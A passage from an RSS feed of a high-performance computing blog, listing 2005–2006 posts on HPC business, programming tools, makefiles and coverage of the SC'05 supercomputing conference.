      <pubDate>Sun, 19 Feb 2006 04:40:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/02/of-business-models-and-business-reality/</guid>
      <description>High performance computing is a tough business. Customers always want more performance. Few want to pay more for this performance. Many vendors want to serve this market, but precious few are pushing more than boxes. It&amp;rsquo;s easy to push boxes, and the really low end vendors, likely having been burned as suppliers of low end Windows machines, decided to work on clusters. Occasionally there are some good ideas. Some really good ones.</description>
    </item>
    
    <item>
      <title>The marketing of computer languages</title>
      <link>https://blog.scalability.org/2006/01/the-marketing-of-computer-languages/</link>
      <pubDate>Wed, 11 Jan 2006 19:53:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/01/the-marketing-of-computer-languages/</guid>
      <description>I have noticed a tendency for technologists, programmers, and others to fall in love with their projects, their tools, &amp;hellip; . Why this happens, I am not sure. I don&amp;rsquo;t love my hammer, my circular saw, my computers, the languages I use. They are tools. They are the means to a goal. Sure, I like some tools more than others, but I am also not going to waste my time misusing a tool for a purpose ill suited for it.</description>
    </item>
    
    <item>
      <title>Is a cluster a toaster?</title>
      <link>https://blog.scalability.org/2006/01/is-a-cluster-a-toaster/</link>
      <pubDate>Thu, 05 Jan 2006 02:34:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/01/is-a-cluster-a-toaster/</guid>
      <description>At the excellent Cluster Monkey, Doug Eadline mused on a number of topics of interest, specifically on why Cluster HPC is hard. There were some excellent points made. The OSC is working on an initiative to increase access to high performance computing resources for end users. Their effort works in part by making access to HPC hardware easier, and in part by helping people (users and commercial entities) make better use of computational gear.</description>
    </item>
    
    <item>
      <title>The difference between an architecture and a product</title>
      <link>https://blog.scalability.org/2006/01/the-difference-between-an-architecture-and-a-product/</link>
      <pubDate>Wed, 04 Jan 2006 08:32:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/01/the-difference-between-an-architecture-and-a-product/</guid>
      <description>This will be a short comment on something I have noticed with engineering led startups. The hardware oriented ones tend to have really neat architectures. Everything is technically beautiful. One problem though. They are not products. A product is finished. It has all the features one might expect out of a product. Yeah, this is a tautology. You don&amp;rsquo;t buy a car with the engine inserted, but no fuel lines hooked up, no instrumentation attached.</description>
    </item>
    
    <item>
      <title>Broken makefiles</title>
      <link>https://blog.scalability.org/2006/01/broken-makefiles/</link>
      <pubDate>Wed, 04 Jan 2006 08:23:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/01/broken-makefiles/</guid>
      <description>I remain consistently amused by the makefiles we see. Some of them are broken beyond repair. If I told you where I found them, and the profile of the projects that they were in, you would have a hard time stopping laughing. No, I am not talking about the auto-generated monstrosities from the GNU auto-tools. I am talking about hand written, and for the most part, borked beyond simple repair. Since I get to teach a nice class on HPC applications shortly, I plan to cover the do&amp;rsquo;s and don&amp;rsquo;ts of makefiles.</description>
    </item>
    
    <item>
      <title>HPC Sales and Technical position open</title>
      <link>https://blog.scalability.org/2005/12/hpc-sales-and-technical-position-open/</link>
      <pubDate>Sat, 10 Dec 2005 07:32:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/12/hpc-sales-and-technical-position-open/</guid>
      <description>Please see http://www.scalableinformatics.com/metadot/index.pl?iid=2179&amp;amp;#jobs for more details.</description>
    </item>
    
    <item>
      <title>SC&#39;05 wrap up</title>
      <link>https://blog.scalability.org/2005/12/sc05-wrap-up/</link>
      <pubDate>Sat, 03 Dec 2005 05:06:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/12/sc05-wrap-up/</guid>
      <description>This took me a while to post, in part due to heavy year end load, but also because I wanted to think through what I did see, and what I didn&amp;rsquo;t. It is important in many processes to take a moment, step back from where you are, and try to assemble the bigger picture of the situation. This introspection can yield invaluable insights. Failing to do it can blind you to what was there, with you focusing mostly on the minutiae.</description>
    </item>
    
    <item>
      <title>Till we meet again ... in Tampa! (not Orlando... Do&#39;h!)</title>
      <link>https://blog.scalability.org/2005/11/till-we-meet-again-in-orlando/</link>
      <pubDate>Thu, 17 Nov 2005 21:48:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/till-we-meet-again-in-orlando/</guid>
      <description>Well, this is the day we had to leave. We saw many things, met many people, had many good conversations. Oddly enough we did not have time to attend talks. I sat in on one BOF. Here is what I observed. IBM is pushing Blue Gene everywhere. In the sessions I did see or hear about from others, it appears that IBM operatives/employees were trying to make a case, even when told that infinite speed wasn&amp;rsquo;t the issue.</description>
    </item>
    
    <item>
      <title>SC&#39;05 sessions</title>
      <link>https://blog.scalability.org/2005/11/sc05-sessions/</link>
      <pubDate>Wed, 16 Nov 2005 15:07:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/sc05-sessions/</guid>
      <description>We had wanted to see several of the sessions including the ClawHmmer, and various others. I spent most of my time talking with various vendors and others on the show floor. ClawHmmer is interesting as it is a GPU version of HMMer, and on good GPU hardware, you can get quite a performance boost on HMMer. The only problem we see is that most servers don&amp;rsquo;t have good hardware accelerated GPUs.</description>
    </item>
    
    <item>
      <title>SC&#39;05 full day 1 (Tuesday)</title>
      <link>https://blog.scalability.org/2005/11/sc05-full-day-1-tuesday/</link>
      <pubDate>Wed, 16 Nov 2005 06:36:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/sc05-full-day-1-tuesday/</guid>
      <description>This morning, SC&#39;05 featured a keynote address from Bill Gates, chairman and co-founder of Microsoft. Prior to the keynote, we watched a video loop, and we heard from the heads of the ACM, and the president-elect of the IEEE, as well as the chairperson of the board for SC&#39;06 in Tampa, Florida. The president-elect gave a good and short talk on a number of things, including the need to get more women and minorities into the profession.</description>
    </item>
    
    <item>
      <title>SC&#39;05 begins ...</title>
      <link>https://blog.scalability.org/2005/11/sc05-begins/</link>
      <pubDate>Tue, 15 Nov 2005 08:16:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/sc05-begins/</guid>
      <description>At 7pm PST the network was officially lit with the traditional cutting of the optical fibre, then a ribbon was cut with a large pair of wooden-handled scissors. Long lines were formed, and much food was consumed. The best thing I saw at the show today is the LightSpace Technology display. The molecular display demo is great, as was the visual human work. The way it works is a very bright digital light pipe technology coupled with diffusive planes for drawing images.</description>
    </item>
    
    <item>
      <title>Setup day batch 1</title>
      <link>https://blog.scalability.org/2005/11/setup-day-batch-1/</link>
      <pubDate>Mon, 14 Nov 2005 21:11:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/setup-day-batch-1/</guid>
      <description>The first batch of setup day photos are up from SC&#39;05. I am on the show floor looking about, talking with people thanks to the Cluster Monkeys and Linux Magazine. Looks to be an interesting show. Please be gentle on my picture taking skills, I am still getting used to this camera. Yes, I did delete pictures of the carpet &amp;hellip; I&amp;rsquo;ll write some comments on what I saw a little later.</description>
    </item>
    
    <item>
      <title>SC&#39;05 T -1 and counting</title>
      <link>https://blog.scalability.org/2005/11/sc05-t-1-and-counting/</link>
      <pubDate>Mon, 14 Nov 2005 16:05:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/sc05-t-1-and-counting/</guid>
      <description>The Sun HPCC group had some nice talks from folks doing real science. Specifically I did get to see a talk on path-integral formalism of molecular dynamics, another on using support vector machines for feature identification in patients with Glaucoma. Also saw quite a bit of stuff we cannot talk about, but it was quite interesting. All in all, a fun time was had by all, but we cannot post pictures as most of the bits were under non-disclosure.</description>
    </item>
    
    <item>
      <title>Conference: T -2 days and counting</title>
      <link>https://blog.scalability.org/2005/11/conference-t-2-days-and-counting/</link>
      <pubDate>Sun, 13 Nov 2005 14:29:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/conference-t-2-days-and-counting/</guid>
      <description>I am here at the Sun HPCC meeting, as they had asked us for a talk on Opteron performance on single and dual core processors for life and chemical science applications. At this talk we gave a peek at our recent HMMer and NCBI BLAST performance among other things. For HMMer, we believe we currently have the fastest build on Opteron. In some of our benchmark tests, we are very close to a factor of 2 faster than the same machine running the canonical version.</description>
    </item>
    
    <item>
      <title>Planes, and automobiles (no trains)</title>
      <link>https://blog.scalability.org/2005/11/planes-and-automobiles-no-trains/</link>
      <pubDate>Sat, 12 Nov 2005 08:08:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/planes-and-automobiles-no-trains/</guid>
      <description>Got here&amp;hellip; finally. Seattle is largely sold out of hotel rooms, so I had to get rooms near the airport. Only a short drive to the conference. Could be worse. Weather is cool (a.k.a. freezing for those from warmer climates) and wet. The car rental person started telling me all about how many times his car was smashed into, right after I declined the extra coverage&amp;hellip; Hmmm&amp;hellip; Maybe that old axiom holds: the selling starts when the customer says &amp;ldquo;no&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>Questions to answer at SC05</title>
      <link>https://blog.scalability.org/2005/11/questions-to-answer-at-sc05/</link>
      <pubDate>Fri, 11 Nov 2005 14:51:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/questions-to-answer-at-sc05/</guid>
      <description>So there should be lots of folks at SC05 to answer questions about technology, products, performance, TCO, and most anything else connected with supercomputing you could want to ask. Some questions I want to ask are from the good folks at Microsoft (Bill Gates is giving the opening keynote), what specifically their HPC initiative is supposed to give us that we don&amp;rsquo;t already have? This is not an OS war, or OSS zealotry, just a simple question as to what their offering will bring to the table.</description>
    </item>
    
    <item>
      <title>Anticipation</title>
      <link>https://blog.scalability.org/2005/11/anticipation/</link>
      <pubDate>Thu, 10 Nov 2005 13:48:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/anticipation/</guid>
      <description>Much has changed in a year. Last year, a number of companies such as Orion were on the rise and the darlings of the event. Companies such as my former employer SGI had a strong presence, reasonable revenues, and there were thoughts of a possible turn around. Startups that garnered far less attention than they deserved, such as Ammasso, were there in a limited fashion. Other startups (mercifully unnamed) that had something of a flash-in-the-pan quality to them seemed abundant.</description>
    </item>
    
    <item>
      <title>Blogging SC05</title>
      <link>https://blog.scalability.org/2005/11/blogging-sc05/</link>
      <pubDate>Wed, 09 Nov 2005 16:07:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/11/blogging-sc05/</guid>
      <description>Please look for us at SC05. I&amp;rsquo;ll be there with a camera and we have a nice site ready to display photos. Some changes from last year. Orion is not in ascendance. Ammasso is out of the game. The buzz is all around FPGAs (just wait until someone tries to port &amp;ldquo;hello world.c&amp;rdquo; to it, but that&amp;rsquo;s another matter). Intel has an x86_64 chip line out. Go figure.</description>
    </item>
    
    <item>
      <title>Venture capital and  high performance computing</title>
      <link>https://blog.scalability.org/2005/10/venture-capital-and-high-performance-computing/</link>
      <pubDate>Wed, 12 Oct 2005 14:30:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2005/10/venture-capital-and-high-performance-computing/</guid>
      <description>It&amp;rsquo;s a very big HPC world. According to IDC and others, it&amp;rsquo;s a $7B+/year world, growing at a nice healthy clip, 10-20% CAGR, depending upon which market research report you read. Seems like a hot market&amp;hellip; right? Well &amp;hellip; sort of. The largest growth (&amp;gt;15% CAGR) is in the 10-25k$US region (small computing engines), with the higher end stuff coming in at a somewhat anemic (~5% CAGR) rate. Still, a 5% growth rate in a market this large is nothing to sneeze at.</description>
    </item>
    
  </channel>
</rss>
